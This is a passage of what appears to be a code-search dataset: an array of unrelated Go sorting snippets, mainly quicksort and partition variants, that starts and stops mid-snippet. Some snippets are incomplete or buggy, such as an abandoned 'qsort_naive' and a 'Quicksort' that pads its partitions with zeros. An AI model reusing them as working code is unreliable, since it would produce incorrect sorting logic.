{\n\t\t\tobjs.Swap(index, lessEqual)\n\t\t\tlessEqual++\n\t\t}\n\t\tindex++\n\t}\n\tobjs.Swap(lessEqual, r)\n\treturn lessEqual\n}", "func qsort_naive(array []int) {\n\ttemp := make([]int, len(array))\n\tcopy(temp, array)\n\t// randomly choose the middle element as the pivot\n\tpivotIndex := int(len(array) / 2)\n\tpivot := array[pivotIndex]\n\n\tfor _, i := range temp {\n\t\tl := 0\n\t\tif i > pivot {\n\t\t\tarray[l] = i\n\t\t\tl++\n\t\t}\n\t}\n\n\t// wait, I don't even know how this works\n\t// don't know where the pivot is going to end up in the list\n\t// I guess that's what bentley's sort is so cool being in-place\n}", "func DjikstraQuickSort(a Sortable) {\n goalgo.Shuffle(a)\n djikstraQuickSort(a, 0, a.Size() - 1)\n}", "func quicksort(target []string) []string {\n\tif len(target) == 0 {\n\t\treturn []string{}\n\t}\n\tif len(target) == 1 {\n\t\treturn target\n\t}\n\tpivot := target[0]\n\tsmaller := []string{}\n\tlarger := []string{}\n\tfor i := 1; i < len(target); i++ {\n\t\tif target[i] < pivot {\n\t\t\tsmaller = append(smaller, target[i])\n\t\t} else {\n\t\t\tlarger = append(larger, target[i])\n\t\t}\n\t}\n\tsmaller = quicksort(smaller)\n\tlarger = quicksort(larger)\n\tsmaller = append(smaller, pivot)\n\tsmaller = append(smaller, larger...)\n\treturn smaller\n}", "func QuickSortInt(arr *[]int, low int, high int) {\n\tif low < high {\n\t\t/* pi is partitioning index, arr[p] is now at right place */\n\t\tpi := PartitionInt(arr, low, high)\n\n\t\t// Separately sort elements before partition and after partition\n\t\tQuickSortInt(arr, low, pi-1)\n\t\tQuickSortInt(arr, pi+1, high)\n\t}\n}", "func partition(s []int, p_index int) int {\n\tpivot := s[p_index]\n\ts[p_index], s[len(s)-1] = s[len(s)-1], s[p_index]\n\tvar l, r int\n\tfor l, r = 0, len(s)-2; l <= r; {\n\t\tif s[l] <= pivot {\n\t\t\tl++\n\t\t} else {\n\t\t\ts[l], s[r] = s[r], s[l]\n\t\t\tr--\n\t\t}\n\t}\n\ts[len(s)-1], s[l] = s[l], s[len(s)-1]\n\treturn l\n}", "func Qsort(a []map[string]interface{}) []map[string]interface{} {\n\tif len(a) < 2 {\n\t\treturn a\n\t}\n\n\tleft, right := 0, len(a)-1\n\n\t// Pick a pivot\n\tpivotIndex := rand.Int() % len(a)\n\n\t// Move the pivot to the right\n\ta[pivotIndex], a[right] = a[right], a[pivotIndex]\n\n\t// Pile elements smaller than the pivot on the left\n\tfor i := range a {\n\t\tif a[i][\"timestamp_sort\"].(float64) > a[right][\"timestamp_sort\"].(float64) {\n\t\t\ta[i], a[left] = a[left], a[i]\n\t\t\tleft++\n\t\t}\n\t}\n\n\t// Place the pivot after the last smaller element\n\ta[left], a[right] = a[right], a[left]\n\n\t// Go down the rabbit hole\n\tQsort(a[:left])\n\tQsort(a[left+1:])\n\n\treturn a\n}", "func Quicksort(A []int64, s Strategy) int {\n\tif len(A) < 2 {\n\t\treturn 0\n\t}\n\n\tp := Partition(A, s(A))\n\n\tcl := 0\n\tif p > 0 {\n\t\tcl = Quicksort(A[:p], s)\n\t}\n\n\tcr := 0\n\tif p < len(A) {\n\t\tcr = Quicksort(A[p+1:], s)\n\t}\n\n\t// the total number of comparisons is composed of the following ones:\n\t// 1. around the pivot in the current recursion (= len(A)-1)\n\t// 2. all recursions left to the pivot\n\t// 3. all recursions right to the pivot\n\tcmp := len(A) - 1 + cl + cr\n\treturn cmp\n}", "func ShellSort(slice []int) {\n\tfor i := len(slice) / 2; i > 0; i = (i + 1) * 5 / 11 {\n\t\tfor j := i; j < len(slice); j++ {\n\t\t\tk, temp := j, slice[j]\n\t\t\tfor ; k >= i && slice[k-i] > temp; k -= i {\n\t\t\t\tslice[k] = slice[k-i]\n\t\t\t}\n\t\t\tslice[k] = temp\n\t\t}\n\t}\n}", "func (qs quickSort) sortAlgo() []int {\n\tfmt.Println(\"\\nQuickSort Implementation\")\n\tarry := quickSortprominent(unSortAr[:])\n\treturn arry[:]\n}", "func QuickSort(a Sortable) {\n goalgo.Shuffle(a)\n quickSort(a, 0, a.Size() - 1)\n}", "func radixQsort(kvs []_MapPair, d, maxDepth int) {\n for len(kvs) > 11 {\n // To avoid the worst case of quickSort (time: O(n^2)), use introsort here.\n // Reference: https://en.wikipedia.org/wiki/Introsort and\n // https://github.com/golang/go/issues/467\n if maxDepth == 0 {\n heapSort(kvs, 0, len(kvs))\n return\n }\n maxDepth--\n\n p := pivot(kvs, d)\n lt, i, gt := 0, 0, len(kvs)\n for i < gt {\n c := byteAt(kvs[i].k, d)\n if c < p {\n swap(kvs, lt, i)\n i++\n lt++\n } else if c > p {\n gt--\n swap(kvs, i, gt)\n } else {\n i++\n }\n }\n\n // kvs[0:lt] < v = kvs[lt:gt] < kvs[gt:len(kvs)]\n // Native implemention:\n // radixQsort(kvs[:lt], d, maxDepth)\n // if p > -1 {\n // radixQsort(kvs[lt:gt], d+1, maxDepth)\n // }\n // radixQsort(kvs[gt:], d, maxDepth)\n // Optimize as follows: make recursive calls only for the smaller parts.\n // Reference: https://www.geeksforgeeks.org/quicksort-tail-call-optimization-reducing-worst-case-space-log-n/\n if p == -1 {\n if lt > len(kvs) - gt {\n radixQsort(kvs[gt:], d, maxDepth)\n kvs = kvs[:lt]\n } else {\n radixQsort(kvs[:lt], d, maxDepth)\n kvs = kvs[gt:]\n }\n } else {\n ml := maxThree(lt, gt-lt, len(kvs)-gt)\n if ml == lt {\n radixQsort(kvs[lt:gt], d+1, maxDepth)\n radixQsort(kvs[gt:], d, maxDepth)\n kvs = kvs[:lt]\n } else if ml == gt-lt {\n radixQsort(kvs[:lt], d, maxDepth)\n radixQsort(kvs[gt:], d, maxDepth)\n kvs = kvs[lt:gt]\n d += 1\n } else {\n radixQsort(kvs[:lt], d, maxDepth)\n radixQsort(kvs[lt:gt], d+1, maxDepth)\n kvs = kvs[gt:] \n }\n }\n }\n insertRadixSort(kvs, d)\n}", "func QuickSort(arr []int) []int {\n\tif len(arr) < 2 {\n\t\treturn arr\n\t}\n\tleft := 0\n\tright := len(arr) - 1\n\tpivot := rand.Int() % len(arr)\n\n\tarr[pivot], arr[right] = arr[right], arr[pivot]\n\n\tfor i := range arr {\n\t\tif arr[i] < arr[right] {\n\t\t\tarr[left], arr[i] = arr[i], arr[left]\n\t\t\tleft++\n\t\t}\n\t}\n\n\tarr[left], arr[right] = arr[right], arr[left]\n\n\tQuickSort(arr[:left])\n\tQuickSort(arr[left+1:])\n\n\treturn arr\n}", "func partition(data []float64) (lows []float64, pivotValue float64, highs []float64) {\n\tlength := len(data)\n\t// there are better (more complex) ways to calculate pivotIndex (e.g. median of 3, median of 3 medians) if this\n\t// proves to be inadequate.\n\tpivotIndex := rand.Int() % length\n\tpivotValue = data[pivotIndex]\n\tlow, high := 1, length-1\n\n\t// put the pivot in the first position\n\tdata[pivotIndex], data[0] = data[0], data[pivotIndex]\n\n\t// partition the data around the pivot\n\tfor low <= high {\n\t\tfor low <= high && data[low] <= pivotValue {\n\t\t\tlow++\n\t\t}\n\t\tfor high >= low && data[high] >= pivotValue {\n\t\t\thigh--\n\t\t}\n\t\tif low < high {\n\t\t\tdata[low], data[high] = data[high], data[low]\n\t\t}\n\t}\n\n\treturn data[1:low], pivotValue, data[high+1:]\n}", "func partitionLomuto(list []int, left, right, pivotIndex int) int {\n\tpivot := list[pivotIndex]\n\n\t// Swap pivot to the end\n\tlist[pivotIndex], list[right] = list[right], list[pivotIndex]\n\n\tstoreIndex := left\n\tfor i := left; i <= right-1; i++ {\n\t\tif list[i] < pivot {\n\t\t\tlist[storeIndex], list[i] = list[i], list[storeIndex]\n\t\t\tstoreIndex++\n\t\t}\n\t}\n\n\t// Swap pivot into its final position\n\tlist[right], list[storeIndex] = list[storeIndex], list[right]\n\n\treturn storeIndex\n}", "func QuickSort(arr []int) []int {\n\tn := len(arr)\n\tif n <= 1 {\n\t\treturn arr\n\t}\n\n\tpivot := arr[0]\n\n\tright := make([]int, 0)\n\tleft := make([]int, 0)\n\tfor i := 1; i <= n-1; i++ {\n\t\tif arr[i] <= pivot {\n\t\t\tleft = append(left, arr[i])\n\t\t} else {\n\t\t\tright = append(right, arr[i])\n\t\t}\n\t}\n\n\tr := QuickSort(right)\n\tl := QuickSort(left)\n\treturn append(append(l, pivot), r...)\n\n}", "func QuickSortDouble(arr *[]float64, low int, high int) {\n\tif low < high {\n\t\t/* pi is partitioning index, arr[p] is now at right place */\n\t\tpi := PartitionDouble(arr, low, high)\n\n\t\t// Separately sort elements before partition and after partition\n\t\tQuickSortDouble(arr, low, pi-1)\n\t\tQuickSortDouble(arr, pi+1, high)\n\t}\n}", "func partitionItems(array []float64, first, last int, r *rand.Rand) int {\n\tpivot := first + r.Intn(last-first-1)\n\tarray[first], array[pivot] = array[pivot], array[first]\n\n\tj := first + 1\n\tfor i := first + 1; i < last; i++ {\n\t\tif array[i] < array[first] {\n\t\t\tarray[j], array[i] = array[i], array[j]\n\t\t\tj++\n\t\t}\n\t}\n\tarray[j-1], array[first] = array[first], array[j-1]\n\treturn j - 1\n}", "func quickSelect(partition func(data sort.Interface, k, a, b int) int, data sort.Interface, k, a, b int) {\n\tfor {\n\t\tp := partition(data, k, a, b) // partition(A, k)\n\t\tif p == k {\n\t\t\treturn\n\t\t}\n\t\tif p > k {\n\t\t\tb = p\n\t\t} else {\n\t\t\t// k <- k - p - 1\n\t\t\ta = p + 1 // A <- A[p+1:|A|]\n\t\t}\n\t}\n}", "func partitionN(data []int, left, right, groupSize int) int {\n\t// insertion sort\n\tfor standardIndex := left + 1; standardIndex < right; standardIndex++ {\n\t\tfor comparedIndex := standardIndex - 1; comparedIndex >= left; comparedIndex-- {\n\t\t\tif data[comparedIndex+1] < data[comparedIndex] {\n\t\t\t\tdata[comparedIndex+1], data[comparedIndex] = data[comparedIndex], data[comparedIndex+1]\n\t\t\t}\n\t\t}\n\t}\n\n\t// get median index\n\tmedianindex := left + groupSize/2\n\n\t// check rightside boundary\n\tif medianindex >= right {\n\t\tmedianindex = right - 1\n\t}\n\n\treturn medianindex\n}", "func QuickSort(arr []int64, start int, end int) {\n\tquickSort(arr, start, end)\n}", "func QuickSort(arr []int, low, high int) []int {\n\tif low < high {\n\t\tpivot := partition(arr, low, high)\n\t\tQuickSort(arr, low, pivot - 1)\n\t\tQuickSort(arr, pivot + 1, high)\n\t}\n\n\treturn arr\n}", "func sort(s []int) {\n\n if len(s) < 2 {\n return\n }\n\n if len(s) == 2 {\n if s[0] > s[1] {\n temp := s[1]\n s[1] = s[0]\n s[0] = temp\n return\n }\n }\n left := 0\n right := len(s) - 1\n quicksort(s, left, right)\n}", "func expandPartition(data sort.Interface, a, p, b, begin, end int) int {\n\t// Invariant: data[a:b+1] is partition around data[p]\n\t// Afterwards: data[begin:end] is partitioned around returned p\n\ti := begin\n\tj := end - 1\n\tfor {\n\t\tfor ; i < a && data.Less(i, p); i++ {\n\t\t}\n\t\tfor ; j > b && !data.Less(j, p); j-- {\n\t\t}\n\t\tif i == a || j == b {\n\t\t\tbreak\n\t\t}\n\t\tdata.Swap(i, j)\n\t\ti++\n\t\tj--\n\t}\n\t// Invariant: data[begin:i], data[a:b+1], data[j+1:end] is partitioned around p\n\tif i != a {\n\t\t// We still need to partition data[i:a] around p\n\t\treturn hoarePartition(data, p, i, a)\n\t}\n\tif j != b {\n\t\t// We still need to partition data[b:j+1] around p\n\t\treturn hoarePartition(data, p, b, j+1)\n\t}\n\treturn p\n}", "func Quicksort(arr []int) []int {\n\tif len(arr) < 2 {\n\t\treturn arr // arrays of size 0 or 1 are sorted\n\t} else {\n\t\trand.Seed(time.Now().UnixNano()) // seeding with the same value results in the same random sequence each run - this ensures this doesn't happen\n\t\trand_pivot_ind := rand.Intn(len(arr)) // random index to select the pivot\n\t\tpivot := arr[rand_pivot_ind] // choose a pivot, a random element would be better in the event of receiving an already sorted array\n\t\tless := make([]int, len(arr)/2) // potentially all elements end up in the left sub-array\n\t\tgreater := make([]int, len(arr)/2) // potentially all elements end up in the right sub-array\n\n\t\tfor i := range arr {\n\t\t\tif i == rand_pivot_ind {\n\t\t\t\t// skip the pivot\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif arr[i] > pivot {\n\t\t\t\tgreater = append(greater, arr[i]) // add all elements greater than the pivot to greater\n\t\t\t} else {\n\t\t\t\tless = append(less, arr[i]) // add all elements less than or equal to the pivot to less\n\t\t\t}\n\t\t}\n\t\t// join results such that:\n\t\t// less + pivot + greater\n\t\tres := append(Quicksort(less), pivot)\n\t\tres = append(res, Quicksort(greater)...)\n\t\treturn res\n\t}\n}", "func partition2(nums []int, l, r int) (int, int) {\n\tif l > r {\n\t\treturn -1, -1\n\t}\n\tif l == r {\n\t\treturn l, r\n\t}\n\tvar less, more, index = l, r, l\n\tfor index < more {\n\t\tif nums[index] == nums[r] {\n\t\t\tindex++\n\t\t} else if nums[index] < nums[r] {\n\t\t\tnums[index], nums[less] = nums[less], nums[index]\n\t\t\tless++\n\t\t\tindex++\n\t\t} else {\n\t\t\tmore--\n\t\t\tnums[index], nums[more] = nums[more], nums[index]\n\t\t}\n\t}\n\tnums[more], nums[r] = nums[r], nums[more]\n\treturn less, more\n}", "func partitionHoare(data []int) int {\n\thi := len(data) - 1\n\tpivot := data[hi/2]\n\ti := -1\n\tj := hi + 1\n\tfor {\n\t\ti++\n\t\tfor data[i] < pivot {\n\t\t\ti++\n\t\t}\n\t\tj--\n\t\tfor data[j] > pivot {\n\t\t\tj--\n\t\t}\n\t\tif i >= j {\n\t\t\treturn j\n\t\t}\n\t\tdata[i], data[j] = data[j], data[i]\n\t}\n}", "func main() {\n\tar := []int{3, 4, 1, 2, 5, 7, -1, 0}\n\tQuicksort(ar)\n\tfmt.Println(ar)\n}", "func QuickSort3(arr []int) {\n\tlength := len(arr)\n\tif length <= 1 {\n\t\treturn\n\t}\n\tpivot := arr[length-1]\n\tlow := -1\n\tfor i := 0; i < length-1; i++ {\n\t\t// move the elem bigger than pivot to the right side.\n\t\tif arr[i] <= pivot {\n\t\t\tlow++\n\t\t\tarr[i], arr[low] = arr[low], arr[i]\n\t\t}\n\t}\n\t// swap the pivot to the mid position.\n\t// low + 1 point to elem > pivot.\n\tarr[length-1], arr[low+1] = arr[low+1], arr[length-1]\n\tQuickSort3(arr[:low])\n\tQuickSort3(arr[low+1:])\n}", "func TestQuickSort(t *testing.T) {\n\tlist := utils.GetArrayOfSize(1e1)\n\tsort(list)\n\tfail := false\n\tfor i := 0; i < len(list)-2; i++ {\n\t\tif list[i] > list[i+1] {\n\t\t\tfmt.Println(\"Error!\")\n\t\t\t// Output: Error!\n\t\t\tt.Error()\n\t\t\tfail = true\n\t\t}\n\t}\n\tif !fail {\n\t\tfmt.Println(\"Success!\")\n\t\t// Output: Success!\n\t}\n}", "func Qsort(a []int) {\n qsortImpl(a, 0, len(a))\n}", "func qabsSort(arr []scoreObject, start int, end int, originNode scoreObject) {\n\tvar (\n\t\tkey scoreObject = arr[start]\n\t\tlow int = start\n\t\thigh int = end\n\t)\n\n\trealNode := func(n scoreObject) float64 {\n\t\treturn math.Abs(n.scoreValue - originNode.scoreValue)\n\t}\n\n\tfor {\n\t\tfor low < high {\n\t\t\tif realNode(arr[high]) < realNode(key) {\n\t\t\t\tarr[low] = arr[high]\n\t\t\t\tbreak\n\t\t\t}\n\t\t\thigh--\n\t\t}\n\t\tfor low < high {\n\t\t\tif realNode(arr[low]) > realNode(key) {\n\t\t\t\tarr[high] = arr[low]\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tlow++\n\t\t}\n\t\tif low >= high {\n\t\t\tarr[low] = key\n\t\t\tbreak\n\t\t}\n\t}\n\tif low-1 > start {\n\t\tqabsSort(arr, start, low-1, originNode)\n\t}\n\tif high+1 < end {\n\t\tqabsSort(arr, high+1, end, originNode)\n\t}\n}", "func sort(arr []int, lo int, hi int) {\n\tif hi <= lo {\n\t\treturn\n\t}\n\tp := partition(arr, lo, hi)\n\tsort(arr, lo, p-1)\n\tsort(arr, p+1, hi)\n}", "func QuicksortByRank(cs []Customer , left int, right int) {\n\tif left < right {\n\t\tpivot := partitionByRank(cs, left, right)\n\t\tQuicksortByRank(cs, left, pivot - 1)\n\t\tQuicksortByRank(cs, pivot + 1, right)\n\t}\n}", "func ShellSort(arr []int) []int {\n\tfmt.Println(\"Shell Sort\")\n\tl := len(arr)\n\tfor gap:=l/2; gap > 0; gap = gap / 2 {\n\t\tfor i := gap ; i < l; i++ {\n\t\t\tvar j = i\n\t\t\tfor {\n\t\t\t\tif j - gap < 0 || arr[j] >= arr[j-gap] {\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tarr[j], arr[j-gap] = arr[j-gap], arr[j]\n\t\t\t\tj = j - gap\n\t\t\t}\n\t\t}\n\t}\n\treturn arr\n}", "func doPivot(slice types.SliceType, pivotChooser PivotChooseFunc) (int, int) {\r\n\t// Invariants are:\r\n\t//\tdata[lo] = pivot (set up by ChoosePivot)\r\n\t//\tdata[lo < i < a] < pivot\r\n\t//\tdata[a <= i < b] <= pivot\r\n\t//\tdata[b <= i < c] unexamined\r\n\t//\tdata[c <= i < hi-1] > pivot\r\n\t//\tdata[hi-1] >= pivot\r\n\tm := pivotChooser(slice)\r\n\tpivot := 0\r\n\thi := len(slice)-1\r\n\ta, c := 1, hi-1\r\n\r\n\tfor ; a < c && slice.Less(a, pivot); a++ {\r\n\t}\r\n\tb := a\r\n\tfor {\r\n\t\tfor ; b < c && !slice.Less(pivot, b); b++ { // slice[b] <= pivot\r\n\t\t}\r\n\t\tfor ; b < c && slice.Less(pivot, c-1); c-- { // slice[c-1] > pivot\r\n\t\t}\r\n\t\tif b >= c {\r\n\t\t\tbreak\r\n\t\t}\r\n\t\t// slice[b] > pivot; slice[c-1] <= pivot\r\n\t\tslice.Swap(b, c-1)\r\n\t\tb++\r\n\t\tc--\r\n\t}\r\n\t// If hi-c<3 then there are duplicates (by property of median of nine).\r\n\t// Let be a bit more conservative, and set border to 5.\r\n\tprotect := hi-c < 5\r\n\tif !protect && hi-c < hi/4 {\r\n\t\t// Lets test some points for equality to pivot\r\n\t\tdups := 0\r\n\t\tif !slice.Less(pivot, hi-1) { // data[hi-1] = pivot\r\n\t\t\tslice.Swap(c, hi-1)\r\n\t\t\tc++\r\n\t\t\tdups++\r\n\t\t}\r\n\t\tif !slice.Less(b-1, pivot) { // data[b-1] = pivot\r\n\t\t\tb--\r\n\t\t\tdups++\r\n\t\t}\r\n\t\t// m-lo = (hi-lo)/2 > 6\r\n\t\t// b-lo > (hi-lo)*3/4-1 > 8\r\n\t\t// ==> m < b ==> data[m] <= pivot\r\n\t\tif !slice.Less(m, pivot) { // data[m] = pivot\r\n\t\t\tslice.Swap(m, b-1)\r\n\t\t\tb--\r\n\t\t\tdups++\r\n\t\t}\r\n\t\t// if at least 2 points are equal to pivot, assume skewed distribution\r\n\t\tprotect = dups > 1\r\n\t}\r\n\tif protect {\r\n\t\t// Protect against a lot of duplicates\r\n\t\t// Add invariant:\r\n\t\t//\tdata[a <= i < b] unexamined\r\n\t\t//\tdata[b <= i < c] = pivot\r\n\t\tfor {\r\n\t\t\tfor ; a < b && !slice.Less(b-1, pivot); b-- { // data[b] == pivot\r\n\t\t\t}\r\n\t\t\tfor ; a < b && slice.Less(a, pivot); a++ { // data[a] < pivot\r\n\t\t\t}\r\n\t\t\tif a >= b {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\t// data[a] == pivot; data[b-1] < pivot\r\n\t\t\tslice.Swap(a, b-1)\r\n\t\t\ta++\r\n\t\t\tb--\r\n\t\t}\r\n\t}\r\n\t// Swap pivot into middle\r\n\tslice.Swap(pivot, b-1)\r\n\treturn b - 1, c\r\n}", "func TestQuickSort(t *testing.T) {\n\tvar nums []int = utils.RandNums(100000000)\n\tQuickSort(nums, 0, len(nums)-1)\n}", "func quickSelectK(a []int, start, end, k int) {\n\tif start >= end || k-1 < start || k-1 > end {\n\t\treturn\n\t}\n\tpivot := a[(start+end)/2]\n\n\ti := start\n\tj := end\n\tfor {\n\t\tfor ; i <= end && a[i] < pivot; i++ {\n\t\t}\n\t\tfor ; j >= start && a[j] > pivot; j-- {\n\t\t}\n\t\tif i >= j {\n\t\t\tbreak\n\t\t}\n\t\ta[i], a[j] = a[j], a[i]\n\t\ti++\n\t\tj--\n\t}\n\n\tif k-1 < i {\n\t\tquickSelectK(a, start, i-1, k)\n\t} else if k-1 > j {\n\t\tquickSelectK(a, j+1, end, k)\n\t}\n}", "func mergeSort(arr MergeSorter, low, high int) {\n\tif high-low<6 { // selection sort\n\t\tfor i:=low; i<=high; i++ {\n\t\t\tfor j:=i+1; j<=high; j++ {\n\t\t\t\tif arr.Less(j, i) {\n\t\t\t\t\tarr.Swap(i, j)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tmid := low+(high-low)/2;\n\tmergeSort(arr, low, mid)\n\tmergeSort(arr, mid+1, high)\n\tmergeTwoSorted(arr, low, mid, mid+1, high)\n}", "func qs(array []float64, k int, first int, last int, r *rand.Rand) {\n\tif first == last-1 {\n\t\treturn\n\t}\n\n\tpivot := partitionItems(array, first, last, r)\n\tif k < pivot {\n\t\tqs(array, k, first, pivot, r)\n\t} else if k > pivot {\n\t\tqs(array, k, pivot+1, last, r)\n\t} else {\n\t\treturn\n\t}\n}", "func ShellSort(a []int, flag bool) {\n\tif Defensive(a) {\n\t\treturn\n\t}\n\tn := len(a)\n\t// split the original array into gap groups\n\tfor gap := n / 2; gap > 0; gap /= 2 {\n\t\tfor i := gap; i < n; i++ {\n\t\t\tif !flag && a[i] < a[i-gap] { // small -> big\n\t\t\t\tfor j := i; j-gap >= 0 && a[j] < a[j-gap]; j -= gap {\n\t\t\t\t\ta[j], a[j-gap] = a[j-gap], a[j]\n\t\t\t\t}\n\t\t\t} else if flag && a[i] > a[i-gap] { // big-> small\n\t\t\t\tfor j := i; j-gap >= 0 && a[j] > a[j-gap]; j -= gap {\n\t\t\t\t\ta[j], a[j-gap] = a[j-gap], a[j]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func (s *Introsort) introSort(data []int, maxdepth int) {\n\t// done\n\tif len(data) <= 1 {\n\t\treturn\n\t}\n\n\t// heapsort\n\tif maxdepth == 0 {\n\t\theapSort(data)\n\t\treturn\n\t}\n\n\t// quicksort\n\tp := partitionLumuto(data)\n\t//p := partitionHoare(data)\n\n\tif s.Concurrent && len(data) > ConcurrentCutoff {\n\t\ts.wg.Add(2)\n\t\tgo func() {\n\t\t\tdefer s.wg.Done()\n\t\t\ts.introSort(data[:p], maxdepth-1) // Lumuto\n\t\t\t//s.introSort(data[:p+1], maxdepth-1) // Hoare\n\t\t}()\n\t\tgo func() {\n\t\t\tdefer s.wg.Done()\n\t\t\ts.introSort(data[p+1:], maxdepth-1)\n\t\t}()\n\t} else {\n\t\ts.introSort(data[:p], maxdepth-1) // Lumuto\n\t\t//s.introSort(data[:p+1], maxdepth-1) // Hoare\n\t\ts.introSort(data[p+1:], maxdepth-1)\n\t}\n}", "func Partition(InpArr []int, low, high int) int {\n\n\tif high - low < 1 {\n\t\tfmt.Println(\"array length less than 2. Either incorrect input or end of recursion\")\n\t}\n\n\tvar pivot = InpArr[low]\n\tvar i = low\n\tvar j = high\n\n\tfor i < j {\n\t\tfor{\n\t\t\ti++\n\t\t\tif (InpArr[i] > pivot) || (i == len(InpArr)-1) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\tfor InpArr[j] > pivot{\n\t\t\tj--\n\t\t}\n\t\tif i < j{\n\t\t\ttemp := InpArr[i]\n\t\t\tInpArr[i] = InpArr[j]\n\t\t\tInpArr[j] = temp\n\t\t}\n\n\t}\n\ttemp := InpArr[low]\n\tInpArr[low] = InpArr[j]\n\tInpArr[j] = temp\n\treturn j\n}", "func QuickSort(values []int) {\n\tqsort(values, 0, len(values)-1)\n}", "func QuickSort(s sortable, isAscending bool) {\n\tascending = isAscending\n\tsort(s, 0, s.Len()-1)\n}", "func mediansort(l []interface{}, left int, right int, cmp func(x interface{}, y interface{}) (int, error)) {\n\tif left < right {\n\t\tmid := (right - left + 1) / 2\n\t\t_ = selectKth(l, mid+1, left, right, cmp)\n\t\tmediansort(l, left, left+mid-1, cmp)\n\t\tmediansort(l, left+mid+1, right, cmp)\n\t}\n}", "func getMedianPivot(data []int, left, right, groupSize int) int {\n\tfor {\n\t\tsize := right - left\n\n\t\tif size < groupSize {\n\t\t\treturn partitionN(data, left, right, groupSize)\n\t\t}\n\n\t\t// index is increased by a group size\n\t\tfor index := left; index < right; index += groupSize {\n\t\t\tsubRight := index + groupSize\n\n\t\t\t// check boundary\n\t\t\tif subRight > right {\n\t\t\t\tsubRight = right\n\t\t\t}\n\n\t\t\t// get median\n\t\t\tmedian := partitionN(data, index, subRight, groupSize)\n\n\t\t\t// move each median to the front of container\n\t\t\tdata[median], data[left+(index-left)/groupSize] =\n\t\t\t\tdata[left+(index-left)/groupSize], data[median]\n\t\t}\n\n\t\t// update the end of medians\n\t\tright = left + (right-left)/groupSize\n\t}\n}", "func MergeSort(src []Comparable) []Comparable {\n\tl := len(src)\n\tif l < 2 {\n\t\treturn src\n\t}\n\n\thalf1 := MergeSort(src[:l/2])\n\thalf2 := MergeSort(src[l/2:])\n\n\tdest := make([]Comparable, 0, l)\n\ti, j := 0, 0\n\tfor i < len(half1) && j < len(half2) {\n\t\tif half1[i].IsLessThan(half2[j]) {\n\t\t\tdest = append(dest, half1[i])\n\t\t\ti++\n\t\t} else {\n\t\t\tdest = append(dest, half2[j])\n\t\t\tj++\n\t\t}\n\t}\n\n\tfor ; i < len(half1); i++ {\n\t\tdest = append(dest, half1[i])\n\t}\n\tfor ; j < len(half2); j++ {\n\t\tdest = append(dest, half2[j])\n\t}\n\n\treturn dest\n}", "func partition(x []int) int {\n\tif len(x) > 1 {\n\t\tpivot := x[0]\n\t\ti := 1\n\n\t\tfor j := i; j < len(x); j++ {\n\t\t\tif x[j] < pivot {\n\t\t\t\ttemp := x[j]\n\t\t\t\tx[j] = x[i]\n\t\t\t\tx[i] = temp\n\t\t\t\ti++\n\t\t\t}\n\t\t}\n\n\t\t// Place the pivot at correct position.\n\t\ttemp := x[i-1]\n\t\tx[i-1] = pivot\n\t\tx[0] = temp\n\n\t\treturn i - 1\n\t}\n\treturn 0\n}", "func partitionLumuto(data []int) int {\n\thi := len(data) - 1\n\tpivot := data[hi]\n\ti := 0\n\tfor j := 0; j <= hi; j++ {\n\t\tif data[j] < pivot {\n\t\t\tdata[i], data[j] = data[j], data[i]\n\t\t\ti++\n\t\t}\n\t}\n\tdata[i], data[hi] = data[hi], data[i]\n\treturn i\n}", "func qsortMulti(a []map[string]float64) []map[string]float64 {\n\tif len(a) < 2 {\n\t\treturn a\n\t}\n\n\tleft, right := 0, len(a)-1\n\n\t// Pick a pivot\n\tpivotIndex := rand.Int() % len(a)\n\n\t// Move the pivot to the right\n\ta[pivotIndex], a[right] = a[right], a[pivotIndex]\n\n\t// Pile elements smaller than the pivot on the left\n\tfor i := range a {\n\t\tif a[i][\"date\"] > a[right][\"date\"] {\n\t\t\ta[i], a[left] = a[left], a[i]\n\t\t\tleft++\n\t\t}\n\t}\n\n\t// Place the pivot after the last smaller element\n\ta[left], a[right] = a[right], a[left]\n\n\t// Go down the rabbit hole\n\tqsortMulti(a[:left])\n\tqsortMulti(a[left+1:])\n\n\treturn a\n}", "func QuickSort(data QuickSorter) {\n\tquickSort(data, 0, data.Len()-1, nil)\n}", "func Partition(A []int64, p int) int {\n\t// swap first element with pivot\n\tA[0], A[p] = A[p], A[0]\n\n\tpv := A[0]\n\ti := 0\n\n\tfor j := range A {\n\t\tif A[j] < pv {\n\t\t\t// swap i <-> j\n\t\t\ti += 1\n\t\t\tA[i], A[j] = A[j], A[i]\n\t\t}\n\t}\n\n\t// swap first element with i'th order statistic (pivot index)\n\tA[0], A[i] = A[i], A[0]\n\n\treturn i\n}", "func BucketSort(a []int) []int {\n\tk, n := a[0], len(a)\n\tbucket := make([][]int, bc)\n\tc := make([]int, n)\n\n\tfor i := 0; i < n; i++ {\n\t\tif a[i] > k {\n\t\t\tk = a[i]\n\t\t}\n\t}\n\n\tm := int(math.Ceil(float64(k) / bc))\n\tfor i := 0; i < n; i++ {\n\t\tbn := a[i] / m // 计算放在哪个桶\n\t\tb := bucket[bn]\n\t\tb = append(b, a[i])\n\t\tfor j := len(b) - 1; j > 0 && b[j] < b[j-1]; j-- {\n\t\t\tb[j], b[j-1] = b[j-1], b[j]\n\t\t}\n\t\tbucket[bn] = b\n\t}\n\n\tfor i, j := 0, 0; i < bc; i++ {\n\t\tb := bucket[i]\n\t\tblen := len(b)\n\t\tcopy(c[j:j+blen], b[0:blen])\n\t\tj += blen\n\t}\n\n\treturn c\n}", "func QuickSortList(start, end *Node) {\n\tif start == end {\n\t\treturn\n\t}\n\tp, q := start, start.next\n\tfor q != end {\n\t\tif q.k < p.k {\n\t\t\t// swap the value, not change list structure\n\t\t\tswap(p, q)\n\t\t\tp = p.next\n\t\t\tswap(p, q)\n\t\t}\n\t\tq = q.next\n\t}\n\t// sort [start, p)\n\tQuickSortList(start, p)\n\t// sort (p, end)\n\tQuickSortList(p.next, end)\n}", "func SelectionSort(slice []int) {\n for i := 0; i < len(slice) - 1; i++ {\n minIndex := i\n for j := i + 1; j < len(slice); j++ {\n if slice[j] < slice[minIndex] {\n minIndex = j\n }\n }\n if i != minIndex {\n slice[i], slice[minIndex] = slice[minIndex], slice[i]\n }\n }\n}", "func 